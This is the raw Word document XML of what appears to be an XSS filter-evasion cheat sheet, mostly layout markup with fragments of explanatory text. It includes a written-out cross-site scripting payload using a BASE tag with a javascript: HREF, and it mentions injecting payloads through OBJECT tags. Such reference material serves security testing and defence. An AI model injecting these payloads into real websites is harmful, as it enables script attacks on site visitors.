      </w:r>
      <w:r>
        <w:tab/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>characters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>so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won't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="63"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>error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tag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render.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Also,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relies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fact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website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dynamically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>placed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="136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75" w:line="667" w:lineRule="auto"/>
        <w:ind w:left="154"/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48575027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221615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="956945" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="704" name="Group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6945" cy="116205"/>
                          <a:chOff x="1614" y="349"/>
                          <a:chExt cx="1507" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="705" name="Freeform 707"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="348"/>
                            <a:ext cx="1507" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3100 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 1507"/>
                              <a:gd name="T2" fmla="+- 0 531 349"/>
                              <a:gd name="T3" fmla="*/ 531 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 1507"/>
                              <a:gd name="T6" fmla="+- 0 531 349"/>
                              <a:gd name="T7" fmla="*/ 531 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 1507"/>
                              <a:gd name="T10" fmla="+- 0 530 349"/>
                              <a:gd name="T11" fmla="*/ 530 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 1507"/>
                              <a:gd name="T14" fmla="+- 0 510 349"/>
                              <a:gd name="T15" fmla="*/ 510 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 1507"/>
                              <a:gd name="T18" fmla="+- 0 506 349"/>
                              <a:gd name="T19" fmla="*/ 506 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 1507"/>
                              <a:gd name="T22" fmla="+- 0 370 349"/>
                              <a:gd name="T23" fmla="*/ 370 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 1507"/>
                              <a:gd name="T26" fmla="+- 0 349 349"/>
                              <a:gd name="T27" fmla="*/ 349 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3100 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 1507"/>
                              <a:gd name="T30" fmla="+- 0 349 349"/>
                              <a:gd name="T31" fmla="*/ 349 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3121 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 1507"/>
                              <a:gd name="T34" fmla="+- 0 370 349"/>
                              <a:gd name="T35" fmla="*/ 370 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3121 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 1507"/>
                              <a:gd name="T38" fmla="+- 0 510 349"/>
                              <a:gd name="T39" fmla="*/ 510 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3103 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 1507"/>
                              <a:gd name="T42" fmla="+- 0 530 349"/>
                              <a:gd name="T43" fmla="*/ 530 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3100 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 1507"/>
                              <a:gd name="T46" fmla="+- 0 531 349"/>
                              <a:gd name="T47" fmla="*/ 53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07" h="183">
                                <a:moveTo>
                                  <a:pt x="148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486" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1507" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1507" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1489" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148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Text Box 70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348"/>
                            <a:ext cx="150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/images/image.jpg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5" o:spid="_x0000_s1725" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:17.45pt;width:75.35pt;height:9.15pt;z-index:-17566208;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,349" coordsize="150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">
                <v:shape id="Freeform 707" o:spid="_x0000_s1726" style="position:absolute;left:1614;top:348;width:1507;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="150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lZ8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74LfYXlCb7qp1Fqiq4gQ6kEK/oFeX7LP&#10;JE32bdjdavz2bqHgcZiZ3zDLdW9acSXna8sKXicJCOLC6ppLBedTNv4A4QOyxtYyKbiTh/VqOFhi&#10;qu2ND3Q9hlJECPsUFVQhdKmUvqjIoJ/Yjjh6F+sMhihdKbXDW4SbVk6T5F0arDkuVNjRtqKiOf4a&#10;BYdm/u3e9vn5p8m/so3e5xl+5kq9jPrNAkSgPjzD/+2dVjBPZvB3Jh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tmVnxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m1486,182l21,182r-3,-1l,161r,-4l,21,21,,1486,r21,21l1507,161r-18,20l1486,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1486,531;21,531;18,530;0,510;0,506;0,370;21,349;1486,349;1507,370;1507,510;1489,530;1486,531" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 706" o:spid="_x0000_s1727" type="#_x0000_t202" style="position:absolute;left:1614;top:348;width:150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Cu+MUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74X+h/AK3mpSD9u6NYqUCoIgrttDj6+b&#10;525w87LdRF3/fSMUPA4z8w0zWwyuFWfqg/Ws4WWsQBBX3liuNXyVq+c3ECEiG2w9k4YrBVjMHx9m&#10;mBt/4YLO+1iLBOGQo4Ymxi6XMlQNOQxj3xEn7+B7hzHJvpamx0uCu1ZOlMqkQ8tpocGOPhqqjvuT&#10;07D85uLT/m5/dsWhsGU5VbzJjlqPnoblO4hIQ7yH/9tro+FVZXA7k4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MK74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/images/image.jpg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5078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661035</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2183765" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="701" name="Group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3765" cy="116205"/>
                          <a:chOff x="1614" y="1041"/>
                          <a:chExt cx="3439" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="702" name="Freeform 704"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="1041"/>
                            <a:ext cx="3439" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5032 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3439"/>
                              <a:gd name="T2" fmla="+- 0 1223 1041"/>
                              <a:gd name="T3" fmla="*/ 1223 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3439"/>
                              <a:gd name="T6" fmla="+- 0 1223 1041"/>
                              <a:gd name="T7" fmla="*/ 1223 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3439"/>
                              <a:gd name="T10" fmla="+- 0 1223 1041"/>
                              <a:gd name="T11" fmla="*/ 1223 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3439"/>
                              <a:gd name="T14" fmla="+- 0 1202 1041"/>
                              <a:gd name="T15" fmla="*/ 1202 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3439"/>
                              <a:gd name="T18" fmla="+- 0 1199 1041"/>
                              <a:gd name="T19" fmla="*/ 1199 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3439"/>
                              <a:gd name="T22" fmla="+- 0 1062 1041"/>
                              <a:gd name="T23" fmla="*/ 1062 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3439"/>
                              <a:gd name="T26" fmla="+- 0 1041 1041"/>
                              <a:gd name="T27" fmla="*/ 1041 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5032 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3439"/>
                              <a:gd name="T30" fmla="+- 0 1041 1041"/>
                              <a:gd name="T31" fmla="*/ 1041 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5053 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3439"/>
                              <a:gd name="T34" fmla="+- 0 1062 1041"/>
                              <a:gd name="T35" fmla="*/ 1062 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5053 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3439"/>
                              <a:gd name="T38" fmla="+- 0 1202 1041"/>
                              <a:gd name="T39" fmla="*/ 1202 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5035 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3439"/>
                              <a:gd name="T42" fmla="+- 0 1223 1041"/>
                              <a:gd name="T43" fmla="*/ 1223 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5032 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3439"/>
                              <a:gd name="T46" fmla="+- 0 1223 1041"/>
                              <a:gd name="T47" fmla="*/ 122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439" h="183">
                                <a:moveTo>
                                  <a:pt x="341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418" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3439" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3439" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3421" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="341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Text Box 70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041"/>
                            <a:ext cx="343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&lt;BASE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HREF="javascript:alert('XSS');//"&gt;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2" o:spid="_x0000_s1728" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:52.05pt;width:171.95pt;height:9.15pt;z-index:-17565696;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,1041" coordsize="343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">
                <v:shape id="Freeform 704" o:spid="_x0000_s1729" style="position:absolute;left:1614;top:1041;width:3439;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="34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53JcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2sCMRTE74V+h/CE3mriH1S2RpHSltJL1RW8PjfP&#10;7NLNy5Kkun77plDocZiZ3zDLde9acaEQG88aRkMFgrjypmGr4VC+Pi5AxIRssPVMGm4UYb26v1ti&#10;YfyVd3TZJysyhGOBGuqUukLKWNXkMA59R5y9sw8OU5bBShPwmuGulWOlZtJhw3mhxo6ea6q+9t9O&#10;w+zzXG7Cx/SttOqYJjjZLl5OVuuHQb95ApGoT//hv/a70TBXY/g9k4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3nclxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3418,182l21,182r-3,l,161r,-3l,21,21,,3418,r21,21l3439,161r-18,21l3418,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3418,1223;21,1223;18,1223;0,1202;0,1199;0,1062;21,1041;3418,1041;3439,1062;3439,1202;3421,1223;3418,1223" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 703" o:spid="_x0000_s1730" type="#_x0000_t202" style="position:absolute;left:1614;top:1041;width:343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cNYMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iF3mpSC7bdGkVEQRCk6/bQ4+vm&#10;uRvcvKybqOu/N4WCx2FmvmEms9414kxdsJ41vAwVCOLSG8uVhu9i9fwOIkRkg41n0nClALPp4GGC&#10;mfEXzum8i5VIEA4ZaqhjbDMpQ1mTwzD0LXHy9r5zGJPsKmk6vCS4a+RIqbF0aDkt1NjSoqbysDs5&#10;DfMfzpf2uP39yve5LYoPxZvxQeunx37+CSJSH+/h//baaHhTr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Rw1g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&lt;BASE</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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HREF="javascript:alert('XSS');//"&gt;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images like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36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work):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="941"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>rather</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>paths.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>includes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leading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>slash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="76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52032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1580515</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-117475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="902970" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="698" name="Group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2970" cy="116205"/>
                          <a:chOff x="2489" y="-185"/>
                          <a:chExt cx="1422" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="699" name="Freeform 701"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2489" y="-186"/>
                            <a:ext cx="1422" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3890 2489"/>
                              <a:gd name="T1" fmla="*/ T0 w 1422"/>
                              <a:gd name="T2" fmla="+- 0 -3 -185"/>
                              <a:gd name="T3" fmla="*/ -3 h 183"/>
                              <a:gd name="T4" fmla="+- 0 2510 2489"/>
                              <a:gd name="T5" fmla="*/ T4 w 1422"/>
                              <a:gd name="T6" fmla="+- 0 -3 -185"/>
                              <a:gd name="T7" fmla="*/ -3 h 183"/>
                              <a:gd name="T8" fmla="+- 0 2507 2489"/>
                              <a:gd name="T9" fmla="*/ T8 w 1422"/>
                              <a:gd name="T10" fmla="+- 0 -3 -185"/>
                              <a:gd name="T11" fmla="*/ -3 h 183"/>
                              <a:gd name="T12" fmla="+- 0 2489 2489"/>
                              <a:gd name="T13" fmla="*/ T12 w 1422"/>
                              <a:gd name="T14" fmla="+- 0 -24 -185"/>
                              <a:gd name="T15" fmla="*/ -24 h 183"/>
                              <a:gd name="T16" fmla="+- 0 2489 2489"/>
                              <a:gd name="T17" fmla="*/ T16 w 1422"/>
                              <a:gd name="T18" fmla="+- 0 -27 -185"/>
                              <a:gd name="T19" fmla="*/ -27 h 183"/>
                              <a:gd name="T20" fmla="+- 0 2489 2489"/>
                              <a:gd name="T21" fmla="*/ T20 w 1422"/>
                              <a:gd name="T22" fmla="+- 0 -164 -185"/>
                              <a:gd name="T23" fmla="*/ -164 h 183"/>
                              <a:gd name="T24" fmla="+- 0 2510 2489"/>
                              <a:gd name="T25" fmla="*/ T24 w 1422"/>
                              <a:gd name="T26" fmla="+- 0 -185 -185"/>
                              <a:gd name="T27" fmla="*/ -185 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3890 2489"/>
                              <a:gd name="T29" fmla="*/ T28 w 1422"/>
                              <a:gd name="T30" fmla="+- 0 -185 -185"/>
                              <a:gd name="T31" fmla="*/ -185 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3911 2489"/>
                              <a:gd name="T33" fmla="*/ T32 w 1422"/>
                              <a:gd name="T34" fmla="+- 0 -164 -185"/>
                              <a:gd name="T35" fmla="*/ -164 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3911 2489"/>
                              <a:gd name="T37" fmla="*/ T36 w 1422"/>
                              <a:gd name="T38" fmla="+- 0 -24 -185"/>
                              <a:gd name="T39" fmla="*/ -24 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3893 2489"/>
                              <a:gd name="T41" fmla="*/ T40 w 1422"/>
                              <a:gd name="T42" fmla="+- 0 -3 -185"/>
                              <a:gd name="T43" fmla="*/ -3 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3890 2489"/>
                              <a:gd name="T45" fmla="*/ T44 w 1422"/>
                              <a:gd name="T46" fmla="+- 0 -3 -185"/>
                              <a:gd name="T47" fmla="*/ -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22" h="183">
                                <a:moveTo>
                                  <a:pt x="140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401" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1422" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1422" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1404" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140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2489" y="-186"/>
                            <a:ext cx="142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3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images/image.jpg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9" o:spid="_x0000_s1731" style="position:absolute;left:0;text-align:left;margin-left:124.45pt;margin-top:-9.25pt;width:71.1pt;height:9.15pt;z-index:15852032;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="2489,-185" coordsize="142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">
                <v:shape id="Freeform 701" o:spid="_x0000_s1732" style="position:absolute;left:2489;top:-186;width:1422;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="142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3W6MUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvZlNRUKTuooIQtBTo4f29si+&#10;JsHs2212jam/vlso9DjMzDfMajOZXow0+M6yguckBUFcW91xo+B82s9fQPiArLG3TAq+ycNm/TBb&#10;YaHtjd9orEIjIoR9gQraEFwhpa9bMugT64ij92kHgyHKoZF6wFuEm14u0jSTBjuOCy062rVUX6qr&#10;UXC4Hpbjh0snV3bvoTzesS5PX0o9PU7bVxCBpvAf/muXWkGW5/B7Jh4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PdboxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m1401,182l21,182r-3,l,161r,-3l,21,21,,1401,r21,21l1422,161r-18,21l1401,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1401,-3;21,-3;18,-3;0,-24;0,-27;0,-164;21,-185;1401,-185;1422,-164;1422,-24;1404,-3;1401,-3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 700" o:spid="_x0000_s1733" type="#_x0000_t202" style="position:absolute;left:2489;top:-186;width:142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WTF8IA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m4k76KxGEdlAGMhqPXh8Ns82&#10;2Lx0TdT635vDYMeP7/di1btG3KgL1rOG8UiBIC69sVxpOBRfbx8gQkQ22HgmDQ8KsFoOXhaYGX/n&#10;nG77WIkUwiFDDXWMbSZlKGtyGEa+JU7c2XcOY4JdJU2H9xTuGvmu1EQ6tJwaamxpU1N52V+dhvWR&#10;80/7uzv95OfcFsVM8ffkovXrsF/PQUTq47/4z701GqYqzU9n0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lZMX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3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images/image.jpg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you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remove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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slash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>long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begin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comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>this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num="2" w:space="708" w:equalWidth="0">
            <w:col w:w="1026" w:space="521"/>
            <w:col w:w="7473"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t>OBJECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tag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72" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>objects,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>virus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>payloads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infect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users,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>etc.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same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APPLET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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actually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contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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XSS: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1276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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4328795" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="695" name="Group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8795" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="6817" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="696" name="Freeform 698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6817" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8409 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 6817"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 6817"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 6817"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 6817"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 6817"/>
                              <a:gd name="T18" fmla="+- 0 323 166"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 6817"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 6817"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8409 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 6817"/>
